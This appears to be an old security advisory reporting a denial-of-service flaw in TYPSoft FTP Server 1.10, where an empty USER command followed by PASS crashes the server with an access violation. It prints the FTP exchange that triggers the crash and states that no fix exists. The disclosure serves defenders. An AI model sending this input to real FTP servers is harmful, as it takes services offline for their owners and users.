Application: TYPSoft FTP Server http://www.typsoft.com Version: 1.10 Bug: Denial Of Service Author: intuit e-mail: intuit@linuxmail.org web/forum: http://code.unixserver.at *********************************************************************** 1. Description 2. The bug 3. The code 4. The fix *********************************************************************** ^^^^^^^^^^^^^^^^ 1. Description: ^^^^^^^^^^^^^^^^ Vendor's Description: "TYPSoft FTP Server is a fast and easy ftp server with support to Standard FTP Command, Clean interface, Virtual File System architecture, ability to resume Download and Upload, IP Restriction, Login/Quit message, logs, Multi Language and many other things." *********************************************************************** ^^^^^^^^^^^^^^^^ 2. The bug: ^^^^^^^^^^^^^^^^ TYPSoft FTP Server may be crashed with empty USERNAME. *********************************************************************** ^^^^^^^^^^^^^^^^ 3. The code: ^^^^^^^^^^^^^^^^ To test the vulnerability simply send to the ftp server a empty user name like: ----------------------------------------------------------------------- 220 TYPSoft FTP Server 1.10 ready... USER 331 Password required for . PASS 501 Access violation at address 77F526AB in module 'ntdll.dll'. Write of address 00404C4D ----------------------------------------------------------------------- and the ftp server may be crashed. Probably 100% employment of computer resources. /*Tested on: Win XP Build 2600, Service Pack: None*/ *********************************************************************** ^^^^^^^^^^^^^^^^ 4. The fix: ^^^^^^^^^^^^^^^^ Not exist. *********************************************************************** -- ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org This allows you to send and receive SMS through your mailbox. Powered by Outblaze